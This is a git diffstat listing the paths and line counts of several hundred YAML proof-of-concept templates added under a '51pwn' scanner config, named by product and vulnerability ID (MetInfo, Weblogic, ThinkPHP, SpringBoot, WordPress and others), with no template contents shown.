CMS/Metinfo-Front-Getshell.yaml | 28 + ...o-V5_0_admin_memeber_getpassword-SQLi.yaml | 39 + .../yaml/MetInfo CMS/Metinfo-V5_1_7-LFI.yaml | 29 + .../Metinfo-V5_1_7_job_php-BindSQLi.yaml | 27 + .../Metinfo-V5_1_FileUpload-Getshell.yaml | 55 + .../MetInfo CMS/Metinfo-V5_2_12-SQLi.yaml | 36 + .../Metinfo-V5_2_thumb_php-FileRead.yaml | 26 + .../Metinfo-V5_3_12_metv5_top_php-SQLi.yaml | 36 + .../Metinfo-V5_3_1_func_php-SQLi.yaml | 37 + .../Metinfo-V5_3_1_news_php-SQLi.yaml | 49 + .../MetInfo CMS/Metinfo-V5_3_search-SQLi.yaml | 42 + .../Metinfo-V5_3_search_php-SQLi.yaml | 37 + .../Metinfo-V5_3_x_uidata_php-Config.yaml | 30 + .../MetInfo CMS/Metinfo-V6_0_0-FileRead.yaml | 33 + ...o-V6_0_0_old_thumb_class_php-FileRead.yaml | 24 + .../Metinfo-V6_0_0_thumb_php-FileRead.yaml | 31 + .../MetInfo CMS/Metinfo-V6_1_0-phpinfo.yaml | 24 + .../MetInfo CMS/Metinfo-img_php-SQLi.yaml | 38 + .../MetInfo CMS/Metinfo-login_check-SQLi.yaml | 41 + ...v6_2_0_admin_index_php-UploadGetShell.yaml | 53 + .../51pwn/yaml/MetInfo CMS/metinfo-lfi.yaml | 42 + .../metadata-service-alibaba.yaml | 29 + .../yaml/Microsoft Azure/CVE-2021-38647.yaml | 63 + .../Microsoft SharePoint/CVE-2020-16952.yaml | 36 + .../Microstrategy Web/CVE-2018-18775.yaml | 29 + .../Microstrategy Web/CVE-2018-18777.yaml | 34 + .../yaml/Mida eFramework/CVE-2020-15920.yaml | 43 + config/51pwn/yaml/MinIO/CVE-2021-21287.yaml | 58 + config/51pwn/yaml/MinIO/CVE-2021-41266.yaml | 54 + .../51pwn/yaml/MinIO/minio-default-login.yaml | 54 + .../CVE-2018-8727.yaml | 34 + .../CVE-2020-35338.yaml | 52 + .../MobileIron Sentry/CVE-2020-15505.yaml | 50 + .../51pwn/yaml/MongoDB/CNVD-2020-26593.yaml | 35 + config/51pwn/yaml/MongoDB/CVE-2019-10758.yaml | 44 + config/51pwn/yaml/MongoDB/CVE-2020-24391.yaml | 60 + config/51pwn/yaml/MongoDB/mongodb-unauth.yaml | 68 + .../51pwn/yaml/Monitorr/CVE-2020-28871.yaml | 41 + .../CVE-2010-2307.yaml | 33 + config/51pwn/yaml/Msvod/CVE-2018-14418.yaml | 34 + .../51pwn/yaml/MySQLDumper/CVE-2012-4253.yaml | 34 + config/51pwn/yaml/MyuCms/myucms-lfr.yaml | 32 + .../NBR-NPE/ruijie-unauthorized-cookie.yaml | 34 + .../yaml/NBR-NPE/wooyun-2015-0123851.yaml | 46 + .../yaml/NCBI ToolBox/CVE-2018-16716.yaml | 25 + .../NComputing vSpace Pro/CVE-2018-10201.yaml | 36 + .../yaml/NETGEAR DGN2200/CVE-2016-5649.yaml | 54 + .../yaml/NETGEAR JGS516PE/CVE-2020-26919.yaml | 46 + .../CVE-2017-5521.yaml | 47 + .../netgear-wac124-router-auth-bypass.yaml | 34 + .../yaml/NETGEAR WN604/CVE-2016-1555.yaml | 31 + .../CVE-2016-6277.yaml | 28 + .../CVE-2020-27866.yaml" | 50 + .../netgear-router-exposure.yaml" | 48 + .../yaml/NPM\345\214\205/CVE-2021-3377.yaml" | 27 + config/51pwn/yaml/NPS/nps-default-login.yaml | 47 + .../nsasg-arbitrary-file-read.yaml" | 40 + .../wamgkang-unauthorized-export_log.yaml" | 47 + .../wangkang_NS_ASG-sqli-menu.yaml" | 37 + .../wooyun-2014-058925.yaml" | 50 + .../wooyun-2014-058932.yaml" | 47 + .../wooyun-2014-058987.yaml" | 62 + .../wooyun-2015-097832.yaml" | 39 + .../yaml/NVRmini2/nuuo-file-inclusion.yaml | 38 + .../nuuo-nvrmini2-upgradehandlephp-rce.yaml | 34 + .../51pwn/yaml/Nagios XI/CVE-2018-10735.yaml | 33 + .../51pwn/yaml/Nagios XI/CVE-2018-10736.yaml | 31 + .../51pwn/yaml/Nagios XI/CVE-2018-10737.yaml | 38 + .../51pwn/yaml/Nagios XI/CVE-2018-10738.yaml | 38 + .../yaml/Nagios/nagios-default-login.yaml | 51 + .../natshell-path-traversal.yaml" | 38 + .../natshell-rce.yaml" | 36 + .../51pwn/yaml/NateMail/CVE-2019-13392.yaml | 31 + .../NeDi Consulting NeDi/CVE-2020-14413.yaml | 33 + .../yaml/Netgear RAX43/CVE-2021-20167.yaml | 32 + .../51pwn/yaml/Netsweeper/CVE-2014-9606.yaml | 35 + .../51pwn/yaml/Netsweeper/CVE-2014-9607.yaml | 36 + .../51pwn/yaml/Netsweeper/CVE-2014-9608.yaml | 35 + .../51pwn/yaml/Netsweeper/CVE-2014-9609.yaml | 34 + .../51pwn/yaml/Netsweeper/CVE-2014-9614.yaml | 42 + .../51pwn/yaml/Netsweeper/CVE-2014-9615.yaml | 32 + .../51pwn/yaml/Netsweeper/CVE-2014-9617.yaml | 29 + .../51pwn/yaml/Netsweeper/CVE-2014-9618.yaml | 37 + .../51pwn/yaml/Netsweeper/CVE-2020-13167.yaml | 35 + config/51pwn/yaml/Nette/CVE-2020-15227.yaml | 28 + .../ruijie-nbr1300g-exposure.yaml | 37 + .../Networks Switch /ruijie-networks-lfi.yaml | 45 + config/51pwn/yaml/Nexus/CVE-2019-7238.yaml | 48 + config/51pwn/yaml/Nexus/CVE-2020-10199.yaml | 37 + config/51pwn/yaml/Nexus/CVE-2020-10204.yaml | 40 + .../51pwn/yaml/Nexus/nexus-default-login.yaml | 50 + config/51pwn/yaml/NexusDB/CVE-2020-24571.yaml | 41 + .../yaml/Nimble Streamer/CVE-2019-11013.yaml | 28 + .../51pwn/yaml/Node-RED/CVE-2021-25864.yaml | 43 + config/51pwn/yaml/Node-RED/CVE-2021-3223.yaml | 49 + .../CVE-2015-6477.yaml" | 33 + .../yaml/Npm netmask/CVE-2021-28918.yaml | 34 + config/51pwn/yaml/Nuxeo/CVE-2018-16341.yaml | 20 + config/51pwn/yaml/OECMS/CVE-2018-12095.yaml | 30 + .../ONKYO Onkyo TX-NR585/CVE-2020-12447.yaml | 21 + .../yaml/Odoo CMS/odoo-cms-redirect.yaml | 29 + .../yaml/Odoo CMS/odoo-database-manager.yaml | 32 + .../CVE-2020-6637.yaml | 40 + .../yaml/Open-School/CVE-2019-14696.yaml | 22 + .../51pwn/yaml/OpenCart/CVE-2018-11231.yaml | 43 + config/51pwn/yaml/OpenEMR/CVE-2012-0991.yaml | 30 + config/51pwn/yaml/OpenSSH/CVE-2018-15473.yaml | 25 + .../51pwn/yaml/OpenStack/CVE-2021-3654.yaml | 34 + .../OpenSymphony XWork/CVE-2007-4556.yaml | 42 + .../51pwn/yaml/OpenTSDB/CVE-2020-35476.yaml | 41 + .../Openbsd Opensmtpd /CVE-2020-7247.yaml | 41 + .../51pwn/yaml/Openfire/CVE-2019-18393.yaml | 35 + .../51pwn/yaml/Openfire/CVE-2019-18394.yaml | 35 + .../51pwn/yaml/Openserver/CVE-2020-25495.yaml | 35 + .../CVE-2020-11853.yaml | 30 + .../Enterprise/CVE-2019-7275.yaml | 22 + .../CVE-2017-3528.yaml | 29 + .../CVE-2018-3167.yaml | 38 + .../CVE-2012-3153.yaml | 47 + .../CVE-2017-10075.yaml | 32 + .../CVE-2018-2791.yaml | 39 + .../CVE-2018-3238.yaml | 42 + .../CVE-2019-2578.yaml | 28 + .../CVE-2019-2588.yaml | 26 + .../CVE-2019-2616.yaml | 28 + .../CVE-2019-2767.yaml | 23 + .../CVE-2020-14864.yaml | 36 + .../CVE-2021-35587.yaml | 35 + .../CVE-2013-3827.yaml | 42 + .../CVE-2017-1000028.yaml | 54 + .../CVE-2017-1000029.yaml | 54 + .../CVE-2018-19439.yaml | 24 + .../CVE-2020-9315.yaml | 31 + config/51pwn/yaml/Osclass/CVE-2014-6308.yaml | 32 + .../PEGA pega infinity/CVE-2021-27651.yaml | 38 + .../51pwn/yaml/PHP-Fusion/CVE-2020-24949.yaml | 30 + .../51pwn/yaml/PHP-Proxy/CVE-2018-19458.yaml | 28 + config/51pwn/yaml/PHP/CVE-2012-1823.yaml | 33 + config/51pwn/yaml/PHPOK/PHPOK-SQLi.yaml | 35 + config/51pwn/yaml/PHPSHE/PHPSHE-SQLi.yaml | 31 + config/51pwn/yaml/PHPUnit/CVE-2017-9841.yaml | 67 + config/51pwn/yaml/PHPUnit/phpunit.yaml | 37 + config/51pwn/yaml/PHPmail/CVE-2016-10033.yaml | 65 + .../PRTG Network Monitor/CVE-2020-11547.yaml | 40 + .../yaml/Pallets Werkzeug/CVE-2019-14322.yaml | 41 + .../CVE-2017-15944.yaml | 34 + .../CVE-2018-10141.yaml | 31 + .../CVE-2020-2036.yaml | 35 + .../panabit-default-login.yaml" | 58 + .../panabit-ixcache-default-login.yaml" | 40 + .../51pwn/yaml/PandoraFMS/CVE-2019-20224.yaml | 37 + .../Bootcms_v1-addform_fcode-sqli.yaml | 37 + .../yaml/PbootCMS/Bootcms_v1-addmsg-sqli.yaml | 37 + .../PbootCMS/Bootcms_v1-ext_price-sqli.yaml | 35 + .../PbootCMS/Bootcms_v1-keyword-sqli.yaml | 35 + .../yaml/PbootCMS/Bootcms_v1-search-sqli.yaml | 35 + .../PbootCMS_v1-About-CommandExecution.yaml | 29 + .../PbootCMS_v1-CommandExecution.yaml | 32 + .../PbootCMS_v1-Content-CommandExecution.yaml | 29 + .../PbootCMS_v1-Index-CommandExecution.yaml | 29 + .../PbootCMS_v1-List-CommandExecution.yaml | 29 + ...CMS_v1-ParserController-CodeExecution.yaml | 34 + .../PbootCMS_v1-Search-CommandExecution.yaml | 29 + .../51pwn/yaml/PbootCMS/PbootCms-312-RCE.yaml | 24 + .../pbootcms-database-file-download.yaml | 33 + .../51pwn/yaml/PilusCart/CVE-2019-16123.yaml | 34 + config/51pwn/yaml/Planon/CVE-2018-18570.yaml | 35 + .../CVE-2018-14931.yaml | 29 + .../PowerCreatorCMS/powercreator-cms-rce.yaml | 57 + .../51pwn/yaml/PrestaShop/CVE-2021-36748.yaml | 43 + .../51pwn/yaml/PrestaShop/CVE-2021-37538.yaml | 38 + .../CVE-2018-15535.yaml | 25 + .../CVE-2018-9161.yaml | 34 + .../yaml/ProcessWire CMS/CVE-2020-27467.yaml | 34 + .../51pwn/yaml/Prometheus/CVE-2021-29622.yaml | 26 + .../yaml/Prometheus/prometheus-config.yaml | 35 + .../yaml/Prometheus/prometheus-exporter.yaml | 37 + .../Prometheus/prometheus-exposed-panel.yaml | 24 + .../yaml/Prometheus/prometheus-flags.yaml | 39 + .../51pwn/yaml/Prometheus/prometheus-log.yaml | 31 + .../yaml/Prometheus/prometheus-metrics.yaml | 39 + .../yaml/Prometheus/prometheus-targets.yaml | 36 + .../yaml/Pulse Secure /CVE-2019-11510.yaml | 33 + .../Pulse Secure /pulse-secure-panel.yaml | 33 + config/51pwn/yaml/Puppet/CVE-2020-7943.yaml | 38 + .../pyspider-unauthorized-access.yaml | 42 + config/51pwn/yaml/QCubed/CVE-2020-24912.yaml | 37 + config/51pwn/yaml/QNAP/CVE-2019-7192.yaml | 80 + .../QSAN Storage Manager/CVE-2021-37216.yaml | 38 + config/51pwn/yaml/RG-UAC/CNVD-2021-14536.yaml | 53 + .../yaml/RG-UAC/ruijie-password-leak.yaml | 44 + .../RG-UAC/ruijie_RG_UAC-defaultUserpass.yaml | 31 + .../yaml/RabbitMQ/rabbitmq-default-login.yaml | 51 + config/51pwn/yaml/Rails/CVE-2015-3224.yaml | 35 + config/51pwn/yaml/Rails/CVE-2018-3760.yaml | 56 + config/51pwn/yaml/Rails/CVE-2019-5418.yaml | 52 + config/51pwn/yaml/Rails/CVE-2020-8163.yaml | 23 + config/51pwn/yaml/Rails/CVE-2021-44528.yaml | 48 + .../yaml/Rails/rails-database-config.yaml | 31 + .../Rails/rails-secret-token-disclosure.yaml | 36 + config/51pwn/yaml/Rails/rails6-xss.yaml | 40 + .../CVE-2020-29164.yaml | 30 + .../yaml/Ranger/ranger-default-login.yaml | 40 + config/51pwn/yaml/RaspAP/CVE-2021-33357.yaml | 43 + .../Redwood Report2Web/CVE-2021-26710.yaml | 35 + .../yaml/Resin/resin-cnnvd-200705-315.yaml | 39 + .../yaml/Resin/resin-inputfile-fileread.yaml | 37 + .../51pwn/yaml/Resin/resin-viewfile-lfr.yaml | 57 + .../yaml/ResourceSpace/CVE-2015-3648.yaml | 34 + .../yaml/ResourceSpace/CVE-2021-41951.yaml | 34 + .../CVE-2018-14728.yaml | 26 + .../yaml/Revive Adserver/CVE-2020-8115.yaml | 32 + .../yaml/Revive Adserver/CVE-2021-22873.yaml | 41 + .../51pwn/yaml/RockMongo/CVE-2013-5108.yaml | 39 + .../RockMongo/rockmongo-default-login.yaml | 51 + .../51pwn/yaml/RocketChat/CVE-2020-28208.yaml | 41 + .../Rstudio Shiny Server/CVE-2021-3374.yaml | 37 + config/51pwn/yaml/Rubedo/CVE-2018-16836.yaml | 34 + config/51pwn/yaml/Ruby/CVE-2021-33564.yaml | 28 + .../Ruckus IoT Controller/CVE-2021-33221.yaml | 40 + .../CVE-2019-19368.yaml | 31 + config/51pwn/yaml/Ruoyi/CNVD-2021-01931.yaml | 40 + .../CVE-2020-6308.yaml | 28 + .../CVE-2018-2392.yaml | 81 + .../yaml/SAP NetWeaver/CVE-2016-2389.yaml | 34 + .../yaml/SAP NetWeaver/CVE-2017-12637.yaml | 39 + .../yaml/SAP NetWeaver/CVE-2020-6287.yaml | 43 + .../SAP Solution Manager/CVE-2020-6207.yaml | 43 + config/51pwn/yaml/SCIMono/CVE-2021-21479.yaml | 32 + .../51pwn/yaml/SEO Panel/CVE-2021-3002.yaml | 41 + config/51pwn/yaml/SIMATIC/CVE-2014-2908.yaml | 35 + config/51pwn/yaml/SPIP/CVE-2016-7981.yaml | 35 + .../51pwn/yaml/Sahi Pro/CVE-2018-20470.yaml | 39 + .../yaml/SaltStack Salt/CVE-2020-16846.yaml | 51 + .../yaml/SaltStack Salt/CVE-2021-25281.yaml | 57 + .../CVE-2018-12054.yaml | 34 + .../yaml/Seagate NAS OS/CVE-2018-12300.yaml | 22 + .../51pwn/yaml/SearchBlox/CVE-2020-35580.yaml | 27 + .../SecNet AC/secnet-ac-default-password.yaml | 45 + .../Sensio Labs Symfony/CVE-2015-4050.yaml | 28 + .../CVE-2020-17456.yaml" | 48 + .../CVE-2021-27132.yaml | 37 + .../yaml/ShowDoc/showdoc-default-login.yaml | 42 + .../yaml/ShowDoc/showdoc-file-upload-rce.yaml | 39 + .../yaml/Siteserver CMS/exploits-46259.yaml | 35 + .../yaml/Siteserver CMS/exploits-46260-1.yaml | 25 + .../yaml/Siteserver CMS/exploits-46260.yaml | 27 + .../CVE-2021-20837.yaml" | 46 + .../51pwn/yaml/SkyWalking/CVE-2020-9483.yaml | 42 + .../CVE-2020-7136.yaml" | 47 + .../51pwn/yaml/Smartweb/CNVD-2020-56167.yaml | 42 + .../51pwn/yaml/Smartweb/CNVD-2021-17369.yaml | 44 + .../51pwn/yaml/SolarWinds/CVE-2018-19386.yaml | 28 + .../51pwn/yaml/SolarWinds/CVE-2020-10148.yaml | 39 + .../SolarWinds/solarwinds-default-admin.yaml | 45 + config/51pwn/yaml/Solr/CVE-2017-12629.yaml | 33 + config/51pwn/yaml/Solr/CVE-2019-0193.yaml | 47 + config/51pwn/yaml/Solr/CVE-2019-17558.yaml | 53 + config/51pwn/yaml/Solr/CVE-2021-27905.yaml | 43 + .../yaml/Solr/apache-solr-file-read.yaml | 42 + .../yaml/Solr/apache-solr-log4j-rce.yaml | 37 + config/51pwn/yaml/Solr/solr-exposure.yaml | 31 + .../51pwn/yaml/SonarQube/CVE-2020-27986.yaml | 33 + .../SonarQube/sonarqube-public-projects.yaml | 39 + config/51pwn/yaml/SonicOS/CVE-2021-20031.yaml | 35 + .../sonicwall-sslvpn-shellshock.yaml | 34 + .../yaml/Sonicwall SMA100/CVE-2021-20038.yaml | 37 + .../Sonicwall SRA 4600 VPN/CVE-2019-7481.yaml | 49 + .../51pwn/yaml/SourceBans/CVE-2015-8349.yaml | 35 + .../CVE-2020-29227.yaml | 29 + .../51pwn/yaml/Spring Data/CVE-2018-1273.yaml | 34 + .../yaml/Spring Data/exposed-alps-spring.yaml | 34 + .../yaml/SpringBoot/SpringBoot-H2db-Rce.yaml | 38 + .../yaml/SpringBoot/SpringBoot-Heapdump.yaml | 30 + .../yaml/SpringBoot/SpringBoot-Metrics.yaml | 34 + .../yaml/SpringBoot/Springboot-Httptrace.yaml | 38 + .../yaml/SpringBoot/Springboot-Loggers.yaml | 36 + .../springboot-actuators-jolokia-xxe.yaml | 34 + .../SpringBoot/springboot-autoconfig.yaml | 29 + .../yaml/SpringBoot/springboot-beans.yaml | 37 + .../SpringBoot/springboot-configprops.yaml | 36 + .../yaml/SpringBoot/springboot-dump.yaml | 40 + .../51pwn/yaml/SpringBoot/springboot-env.yaml | 42 + .../yaml/SpringBoot/springboot-gateway.yaml | 35 + .../yaml/SpringBoot/springboot-health.yaml | 29 + .../yaml/SpringBoot/springboot-info.yaml | 37 + .../yaml/SpringBoot/springboot-mappings.yaml | 37 + .../SpringBoot/springboot-threaddump.yaml | 38 + .../yaml/SpringBoot/springboot-trace.yaml | 35 + .../51pwn/yaml/SpringCloud/CVE-2019-3799.yaml | 26 + .../51pwn/yaml/SpringCloud/CVE-2020-5405.yaml | 48 + .../51pwn/yaml/SpringCloud/CVE-2020-5410.yaml | 28 + .../51pwn/yaml/SpringCloud/CVE-2020-5412.yaml | 32 + .../yaml/SpringCloud/CVE-2021-22053.yaml | 29 + .../yaml/SpringCloud/CVE-2022-22947.yaml | 76 + .../yaml/SpringCloud/CVE-2022-22963.yaml | 33 + .../51pwn/yaml/SpringMvc/CVE-2018-1271.yaml | 27 + .../yaml/SquirrelMail/CVE-2002-1131.yaml | 34 + .../yaml/SquirrelMail/CVE-2004-0519.yaml | 31 + .../yaml/SquirrelMail/CVE-2006-2842.yaml | 30 + .../51pwn/yaml/Squirrelly/CVE-2021-32819.yaml | 32 + .../CVE-2020-9344.yaml | 56 + .../SugarCRM Enterprise/CVE-2019-14974.yaml | 26 + config/51pwn/yaml/SugarCRM/CVE-2018-5715.yaml | 30 + .../51pwn/yaml/Superset/CVE-2021-44451.yaml | 59 + .../51pwn/yaml/Supervisor/CVE-2017-11610.yaml | 50 + .../CVE-2021-30049.yaml | 31 + .../CVE-2021-31862.yaml | 24 + config/51pwn/yaml/TOS/CVE-2020-15568.yaml | 26 + config/51pwn/yaml/TOS/CVE-2022-24990.yaml | 37 + .../TP_Link-unauthorized_access-conf_bin.yaml | 30 + .../TP-link_TD-8820/wooyun-2014-075723.yaml | 37 + .../TPLINK AC1750/TPLINK_AC1750-login.yaml | 26 + .../yaml/TPLink_TL-R600VPN/CVE-2018-3949.yaml | 26 + .../TpShop-Sqli.yaml" | 33 + .../tpshop-directory-traversal.yaml" | 30 + .../yaml/TVT NVMS-1000/CVE-2019-20085.yaml | 27 + config/51pwn/yaml/TYPO3/CVE-2017-15363.yaml | 40 + config/51pwn/yaml/TamronOS/tamronos-rce.yaml | 25 + .../51pwn/yaml/Tapestry/CVE-2021-27850.yaml | 46 + .../yaml/Teclib GLPI/CVE-2020-11034.yaml | 46 + .../UnAuthenticated-Tensorboard.yaml | 27 + .../51pwn/yaml/ThinkAdmin/CVE-2020-25540.yaml | 24 + .../thinkcmf-arbitrary-code-execution.yaml | 27 + config/51pwn/yaml/ThinkCMF/thinkcmf-rce.yaml | 29 + .../51pwn/yaml/ThinkPHP/ThinkPHP-2-Rce.yaml | 31 + .../51pwn/yaml/ThinkPHP/ThinkPHP-501-RCE.yaml | 30 + .../ThinkPHP-509-InformationDisclosure.yaml | 28 + .../yaml/ThinkPHP/thinkphp-5023-rce.yaml | 30 + .../thinkphp5-rce-invokefunction.yaml | 25 + config/51pwn/yaml/Tika/CVE-2018-1335.yaml | 42 + .../yaml/Tiki Wiki CMS/CVE-2010-4239.yaml | 25 + .../yaml/Tiki Wiki CMS/CVE-2011-4336.yaml | 30 + config/51pwn/yaml/Typecho/Typecho-Rce.yaml | 40 + .../ueditor_1433_net-upload-catchimage.yaml" | 30 + .../51pwn/yaml/Ulterius /CVE-2017-16806.yaml | 49 + config/51pwn/yaml/Umbraco/CVE-2015-8813.yaml | 48 + config/51pwn/yaml/Unomi/CVE-2020-13942.yaml | 54 + config/51pwn/yaml/Unraid/CVE-2020-5847.yaml | 53 + .../yaml/V5SHOP/V5Shop-sqli-commond.yaml | 34 + .../51pwn/yaml/V5SHOP/wooyun-2013-043187.yaml | 45 + .../yaml/V5SHOP/wooyun-2015-0101820.yaml | 45 + .../51pwn/yaml/VICIdial/CVE-2021-28854.yaml | 48 + .../vmware-horizon-log4j-jndi-rce.yaml | 37 + .../VMware Horizon/vmware-horizon-panel.yaml | 36 + .../VMware View Planner/CVE-2021-21978.yaml | 57 + .../VMware vCenter Server/CVE-2021-22005.yaml | 48 + .../VmwareVcenter-Arbitrary-FileRead.yaml | 46 + .../CVE-2021-21975.yaml | 40 + .../vrealize-operations-log4j-rce.yaml | 41 + .../VMware vSphere Client/CVE-2021-21972.yaml | 37 + .../VMware vSphere Client/CVE-2021-21985.yaml | 34 + .../yaml/VelotiSmart/CVE-2018-14064.yaml | 28 + .../51pwn/yaml/Vigor300B/CVE-2020-8515.yaml | 33 + .../yaml/VigorConnect/CVE-2021-20123.yaml | 36 + .../yaml/VigorConnect/CVE-2021-20124.yaml | 39 + .../VipChat/Jcms-Vipchat-FileDownload.yaml | 80 + .../poc-yaml-vmware-vcenter-ssrf.yaml | 40 + .../Vmware Workspace One/CVE-2021-22054.yaml | 34 + .../Vmware Workspace One/CVE-2022-22954.yaml | 32 + .../yaml/VoIPmonitor/CVE-2021-30461.yaml | 58 + .../yaml/WaveMaker Studio/CVE-2019-8982.yaml | 48 + .../yaml/Wavlink WN575A4 /CVE-2020-13117.yaml | 63 + .../51pwn/yaml/Web Port/CVE-2019-12461.yaml | 50 + .../51pwn/yaml/WebGlimpse/CVE-2009-5114.yaml | 40 + .../51pwn/yaml/WebSphere/CVE-2015-7450.yaml | 74 + config/51pwn/yaml/Weblogic/CVE-2014-4210.yaml | 31 + .../51pwn/yaml/Weblogic/CVE-2017-10271.yaml | 64 + config/51pwn/yaml/Weblogic/CVE-2017-3506.yaml | 50 + config/51pwn/yaml/Weblogic/CVE-2018-2628.yaml | 33 + config/51pwn/yaml/Weblogic/CVE-2018-2893.yaml | 47 + config/51pwn/yaml/Weblogic/CVE-2018-2894.yaml | 119 + config/51pwn/yaml/Weblogic/CVE-2019-2725.yaml | 46 + config/51pwn/yaml/Weblogic/CVE-2019-2729.yaml | 36 + .../51pwn/yaml/Weblogic/CVE-2020-14750.yaml | 34 + .../51pwn/yaml/Weblogic/CVE-2020-14882.yaml | 32 + .../51pwn/yaml/Weblogic/CVE-2020-14883.yaml | 53 + config/51pwn/yaml/Weblogic/CVE-2020-2551.yaml | 34 + .../51pwn/yaml/Weblogic/CVE-2022-21371.yaml | 46 + .../CVE-2018-8770.yaml | 48 + .../yaml/Wifisky/wifisky-default-login.yaml | 52 + .../yaml/Wing FTP Server/CVE-2020-27735.yaml | 51 + .../yaml/Wlan AP /samsung-wlan-ap-lfi.yaml | 41 + .../yaml/Wlan AP /samsung-wlan-ap-rce.yaml | 36 + .../yaml/Wlan AP /samsung-wlan-ap-xss.yaml | 40 + .../Wlan AP /samsung-wlan-default-login.yaml | 50 + .../51pwn/yaml/WordPress /CVE-2021-24987.yaml | 51 + ...WordPressPlugin-Advanced-Dewplayerlfd.yaml | 31 + .../yaml/WordPress/CNNVD-201412-193.yaml | 33 + .../51pwn/yaml/WordPress/CNVD-2011-3440.yaml | 31 + .../51pwn/yaml/WordPress/CNVD-2011-3594.yaml | 31 + .../51pwn/yaml/WordPress/CNVD-2011-6136.yaml | 31 + .../51pwn/yaml/WordPress/CNVD-2011-6208.yaml | 27 + .../51pwn/yaml/WordPress/CNVD-2012-5790.yaml | 28 + .../51pwn/yaml/WordPress/CNVD-2012-8656.yaml | 67 + .../51pwn/yaml/WordPress/CNVD-2013-06167.yaml | 31 + .../51pwn/yaml/WordPress/CNVD-2014-01187.yaml | 26 + .../51pwn/yaml/WordPress/CNVD-2014-02541.yaml | 30 + .../51pwn/yaml/WordPress/CNVD-2014-04714.yaml | 32 + .../51pwn/yaml/WordPress/CNVD-2014-05543.yaml | 34 + .../51pwn/yaml/WordPress/CNVD-2014-05548.yaml | 30 + .../51pwn/yaml/WordPress/CNVD-2014-08564.yaml | 37 + .../51pwn/yaml/WordPress/CNVD-2015-02504.yaml | 44 + .../51pwn/yaml/WordPress/CNVD-2015-02598.yaml | 33 + .../51pwn/yaml/WordPress/CNVD-2015-02771.yaml | 68 + .../51pwn/yaml/WordPress/CNVD-2015-02973.yaml | 33 + .../51pwn/yaml/WordPress/CNVD-2015-03375.yaml | 30 + .../51pwn/yaml/WordPress/CNVD-2015-04041.yaml | 30 + .../51pwn/yaml/WordPress/CNVD-2015-04306.yaml | 30 + .../51pwn/yaml/WordPress/CNVD-2015-06157.yaml | 34 + .../51pwn/yaml/WordPress/CNVD-2016-11944.yaml | 37 + .../51pwn/yaml/WordPress/CNVD-2017-00009.yaml | 43 + .../51pwn/yaml/WordPress/CNVD-2018-16474.yaml | 42 + .../51pwn/yaml/WordPress/CNVD-2018-25692.yaml | 30 + .../51pwn/yaml/WordPress/CNVD-2018-26453.yaml | 36 + .../51pwn/yaml/WordPress/CNVD-2019-00234.yaml | 34 + .../51pwn/yaml/WordPress/CNVD-2019-07549.yaml | 29 + .../51pwn/yaml/WordPress/CNVD-2019-07550.yaml | 29 + .../51pwn/yaml/WordPress/CNVD-2019-08278.yaml | 34 + .../51pwn/yaml/WordPress/CNVD-2019-08493.yaml | 29 + .../51pwn/yaml/WordPress/CNVD-2019-08955.yaml | 29 + .../51pwn/yaml/WordPress/CVE-2011-1669.yaml | 38 + .../51pwn/yaml/WordPress/CVE-2011-4618.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2011-4624.yaml | 46 + .../51pwn/yaml/WordPress/CVE-2011-4926.yaml | 49 + .../51pwn/yaml/WordPress/CVE-2011-5106.yaml | 49 + .../51pwn/yaml/WordPress/CVE-2011-5107.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2011-5179.yaml | 49 + .../51pwn/yaml/WordPress/CVE-2011-5181.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2011-5265.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2012-0896.yaml | 43 + .../51pwn/yaml/WordPress/CVE-2012-0901.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2012-1835.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2012-2371.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2012-2399.yaml | 26 + .../51pwn/yaml/WordPress/CVE-2012-4242.yaml | 47 + .../51pwn/yaml/WordPress/CVE-2012-4273.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2012-4768.yaml | 50 + .../51pwn/yaml/WordPress/CVE-2012-5913.yaml | 49 + .../51pwn/yaml/WordPress/CVE-2013-1852.yaml | 33 + .../51pwn/yaml/WordPress/CVE-2013-2287.yaml | 47 + .../51pwn/yaml/WordPress/CVE-2013-3526.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2013-4117.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2013-4625.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2013-6281.yaml | 60 + .../51pwn/yaml/WordPress/CVE-2013-7240.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2014-1854.yaml | 33 + .../51pwn/yaml/WordPress/CVE-2014-4513.yaml | 47 + .../51pwn/yaml/WordPress/CVE-2014-4535.yaml | 50 + .../51pwn/yaml/WordPress/CVE-2014-4536.yaml | 53 + .../51pwn/yaml/WordPress/CVE-2014-4539.yaml | 53 + .../51pwn/yaml/WordPress/CVE-2014-4544.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2014-4550.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2014-4558.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2014-4561.yaml | 54 + .../51pwn/yaml/WordPress/CVE-2014-4592.yaml | 51 + .../51pwn/yaml/WordPress/CVE-2014-4940.yaml | 46 + .../51pwn/yaml/WordPress/CVE-2014-5368.yaml | 50 + .../51pwn/yaml/WordPress/CVE-2014-5389.yaml | 40 + .../51pwn/yaml/WordPress/CVE-2014-8586.yaml | 36 + .../51pwn/yaml/WordPress/CVE-2014-8799.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2014-8877.yaml | 27 + .../51pwn/yaml/WordPress/CVE-2014-9094.yaml | 47 + .../51pwn/yaml/WordPress/CVE-2014-9097.yaml | 33 + .../51pwn/yaml/WordPress/CVE-2014-9173.yaml | 33 + .../51pwn/yaml/WordPress/CVE-2014-9444.yaml | 48 + .../yaml/WordPress/CVE-2015-1000005.yaml | 33 + .../yaml/WordPress/CVE-2015-1000010.yaml | 32 + .../yaml/WordPress/CVE-2015-1000012.yaml | 52 + .../51pwn/yaml/WordPress/CVE-2015-1494.yaml | 28 + .../51pwn/yaml/WordPress/CVE-2015-2807.yaml | 48 + .../51pwn/yaml/WordPress/CVE-2015-2824.yaml | 34 + .../51pwn/yaml/WordPress/CVE-2015-2825.yaml | 44 + .../51pwn/yaml/WordPress/CVE-2015-2826.yaml | 37 + .../51pwn/yaml/WordPress/CVE-2015-3301.yaml | 41 + 